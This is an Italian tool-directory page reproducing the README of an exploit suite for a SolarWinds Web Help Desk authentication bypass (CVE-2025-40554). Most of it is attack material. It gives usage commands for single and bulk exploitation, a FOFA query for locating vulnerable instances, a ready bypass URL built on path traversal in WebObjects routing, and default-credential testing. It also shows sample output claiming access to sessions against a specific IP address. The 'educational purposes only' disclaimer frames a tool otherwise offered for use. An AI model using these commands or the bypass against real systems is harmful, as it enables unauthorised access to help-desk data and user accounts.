Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-40554 — Sfruttamento di CVE-2025-40554 | Kitploit
Strumenti/GitHubGitHub/skynoxk/cve-2025-40554
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingAutenticazione
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

Sfruttamento di CVE-2025-40554

Vedi Repository
27 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-40554 Exploitation Suite

Uno strumento completo di test di sicurezza per rilevare e sfruttare la vulnerabilità di bypass dell'autenticazione (CVE-2025-40554 / CVE-2025-40536) in SolarWinds Web Help Desk.

⚠️ Disclaimer

SOLO PER SCOPI EDUCATIVI E TEST DI SICUREZZA AUTORIZZATI

Questo strumento è fornito per ricerca sulla sicurezza, test di penetrazione e valutazione delle vulnerabilità su sistemi di tua proprietà o per i quali hai esplicito permesso scritto di testare. L'accesso non autorizzato a sistemi informatici è illegale. Gli autori non sono responsabili per l'uso improprio o i danni causati da questo strumento.

🔍 Panoramica della Vulnerabilità

CVE-2025-40554 è una vulnerabilità critica di bypass dell'autenticazione in SolarWinds Web Help Desk che consente ad attaccanti non autenticati di:

  • Bypassare i meccanismi di autenticazione
  • Accedere a funzioni amministrative privilegiate (Autenticazione)
  • Enumerare la configurazione del sistema

Versioni Affette

  • SolarWinds Web Help Desk (le informazioni sulla versione specifica devono essere verificate)
  • Controllare gli advisory di sicurezza di SolarWinds per le versioni con patch

🚀 Funzionalità

Controlla da solo :))

Dipendenze:

  • Python 3.6+
  • Libreria requests
  • Libreria urllib3

🛠️ Installazione

root@kitploit:~
# Clona o scarica lo script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# Rendi eseguibile
chmod +x CVE-2025-40554.py

📖 FOFA

root@kitploit:~
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 Utilizzo

Scansione Base (Target Singolo)

root@kitploit:~
# Controllo semplice della vulnerabilità
python3 CVE-2025-40554.py -t https://target:8443

# Con protocollo esplicito
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

Modalità di Sfruttamento Completo

root@kitploit:~
# Sfruttamento completo con enumerazione delle sessioni
python3 CVE-2025-40554.py -t https://target:8443 --exploit

# Salta il test delle credenziali predefinite
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login

Scansione in Blocco

root@kitploit:~
# Scansiona più target da file
python3 CVE-2025-40554.py -l targets.txt

# Scansione in blocco con sfruttamento
python3 CVE-2025-40554.py -l targets.txt --exploit

# Modalità silenziosa (output minimo)
python3 CVE-2025-40554.py -l targets.txt -q

# File di output personalizzato
python3 CVE-2025-40554.py -l targets.txt -o results.txt

Formato del File dei Target

targets.txt:

root@kitploit:~
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# I commenti sono supportati

🎯 Opzioni della Riga di Comando

📊 Esempi di Output

Sfruttamento Riuscito

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     Authentication Bypass Exploitation Tool                       ║
║     Research & Educational Purposes Only                          ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: Establishing session...
[+] WOSID extracted: AbCdEfGhIjKlMnOpQrStU
[+] XSRF token: abc123-def456-ghi789

[*] Step 2: Testing authentication bypass...
[+] Found bypass indicators: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - Auth bypass confirmed!

[*] Step 3: Testing default credentials (client/client)...
[+] SUCCESS - Default credentials work!

======================================================================
EXPLOITATION MODE - CVE-2025-40554 Auth Bypass
======================================================================

[*] Bypass URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Triggering authentication bypass...
[+] Auth bypass successful!

[*] Session Cookies:
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
SUMMARY
======================================================================
[+] Target is VULNERABLE to CVE-2025-40554
[+] Default credentials: WORK
======================================================================

Risultati Scansione in Blocco

root@kitploit:~
[*] Loaded 5 unique targets from targets.txt
[*] Mode: Bypass + default credential test
[*] Full exploitation enabled

[1/5] Testing https://target1:8443
[+] VULNERABLE - Auth bypass confirmed!
[+] SUCCESS - Default credentials work!

[2/5] Testing https://target2:8443
[!] NOT VULNERABLE - Auth bypass failed

...

======================================================================
SCAN SUMMARY
======================================================================
Total scanned:     5/5
Vulnerable:        2
With def. creds:   1
======================================================================

[+] Results saved to: vulnerable_targets.txt

🔧 Dettagli Tecnici

Flusso di Sfruttamento

  1. Stabilimento della Sessione

    • Si connette all'istanza WHD
    • Estrae WOSID (WebObjects Session ID) da più fonti
    • Cattura il token XSRF se presente
  2. Bypass dell'Autenticazione

    • Costruisce un URL malevolo con iniezione WOSID
    • Sfrutta path traversal nel routing di WebObjects
    • Bypassa i controlli di autenticazione
  3. Test delle Credenziali (opzionale)

    • Analizza il modulo di login con protezione CSRF
    • Testa le credenziali predefinite (client/client)
    • Convalida l'autenticazione riuscita
  4. Sfruttamento Completo (modalità --exploit)

    • Esporta i cookie di sessione
    • accede a email, ticket, database, utenti, (rimosso)

Indicatori di Vulnerabilità

Lo strumento rileva il bypass riuscito controllando:

  • externalAuthContainer - Configurazione auth esterna
  • JSONRpcClient - Esposizione API client
  • SAML 2.0 - Configurazione SSO
  • LoginPref - Impostazioni preferenze login
  • authMode - Impostazioni modalità autenticazione

🤝 Contributi

I contributi sono benvenuti.....

📚 Riferimenti

  • Dettagli CVE-2025-40554
  • Dettagli CVE-2025-40536
  • Advisory di Sicurezza SolarWinds
  • Documentazione del Framework WebObjects

📄 Licenza

Questo strumento è fornito "così com'è" senza alcuna garanzia. Utilizzare a proprio rischio.

👤 Autore

Skynoxk


Ricorda: Hackerizza sempre in modo etico e legale. L'accesso non autorizzato è un reato.

Scarica lo strumento
OpzioneDescrizione
-t, --target URLURL del singolo target da testare
-l, --list FILEFile contenente l'elenco dei target (uno per riga)
--exploitAbilita la modalità di sfruttamento completo con enumerazione
--no-loginSalta il test delle credenziali predefinite
-o, --output FILEFile di output per i target vulnerabili (default: vulnerable_targets.txt)
-q, --quietModalità di output minimo (utile per scansioni in blocco)